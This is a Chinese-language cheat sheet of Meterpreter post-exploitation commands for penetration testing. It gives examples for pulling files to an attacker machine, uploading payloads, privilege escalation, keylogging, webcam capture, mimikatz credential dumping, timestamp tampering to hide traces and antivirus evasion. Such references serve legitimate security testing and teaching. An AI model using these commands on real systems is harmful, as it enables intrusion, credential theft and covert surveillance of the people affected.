meterpreter常用命令
以下是 Meterpreter 常用命令的整理,涵盖文件操作、系统控制、信息收集、权限提升等渗透测试场景:
一、基础命令
help
• 查看所有可用命令及说明。background
• 将当前会话切换到后台(返回MSF控制台)。sessions
• 在MSF中查看所有活跃会话,sessions -i <ID>重新进入指定会话。sysinfo
• 查看目标系统信息(OS、架构、主机名等)。getuid
• 显示当前权限(如NT AUTHORITY\SYSTEM)。exit或quit
• 终止当前Meterpreter会话。
二、文件操作
pwd或getwd
• 查看当前工作目录。cd
• 切换目录(支持C:\\或C:/格式)。ls或dir
• 列出当前目录下的文件和子目录。cat
• 读取文件内容:meterpreter > cat C:\\flag.txtdownload
• 下载文件到攻击机:meterpreter > download C:\\secret.txt /home/kali/upload
• 上传本地文件到目标:meterpreter > upload /tmp/payload.exe C:\\Windows\\Tempedit
• 用默认编辑器修改文件(需权限)。rm或del
• 删除文件:meterpreter > rm C:\\temp\\logs.txtmkdir
• 创建目录:meterpreter > mkdir C:\\hacked
三、系统控制
shell
• 进入目标系统的命令行(CMD或Bash),exit返回Meterpreter。execute
• 执行系统命令:meterpreter > execute -f cmd.exe -i # 交互式CMD meterpreter > execute -f "calc.exe" # 启动计算器ps
• 列出所有正在运行的进程。migrate
• 迁移到其他进程(提升稳定性或权限):meterpreter > migrate <PID> # 迁移到指定进程(如explorer.exe)kill
• 终止指定进程:meterpreter > kill <PID>getpid
• 查看当前Meterpreter的进程ID。reboot或shutdown
• 重启或关闭目标系统。
四、网络操作
ipconfig
• 查看目标网络接口信息(IP、网关等)。portfwd
• 端口转发(将目标内网端口映射到本地):meterpreter > portfwd add -l 8080 -p 80 -r 192.168.1.100route
• 查看目标内网路由表,辅助内网渗透。
五、权限提升
getsystem
• 尝试提权到SYSTEM权限(依赖漏洞利用)。load incognito
• 加载令牌模拟模块:meterpreter > list_tokens -u # 列出可用令牌 meterpreter > impersonate_token "NT AUTHORITY\\SYSTEM" # 模拟令牌bypassuac
• 绕过UAC(需配合模块使用)。
六、信息收集
run post/windows/gather/arp_scanner
• 扫描目标内网ARP表。run post/windows/gather/enum_logged_on_users
• 枚举已登录用户。keyscan_start和keyscan_dump
• 启动键盘记录并导出击键内容(需迁移到用户进程)。screenshot
• 截取目标屏幕:meterpreter > screenshot /tmp/screen.pngwebcam_list和webcam_snap
• 列出摄像头设备并拍摄照片。
七、其他实用功能
run vnc
• 启动VNC远程桌面(需权限)。load kiwi或load mimikatz
• 加载密码提取工具(获取明文密码或哈希):meterpreter > creds_all # 提取所有凭据timestomp
• 修改文件时间戳(隐藏痕迹)。
注意事项
- 路径格式:使用
C:\\或C:/,避免单反斜杠。 - 权限依赖:部分命令需管理员或SYSTEM权限。
- 进程迁移:尽量迁移到稳定进程(如
explorer.exe)。 - 规避检测:使用
migrate和inject避免被杀毒软件拦截。 - 使用
help查看详细命令:meterpreter > help <命令名>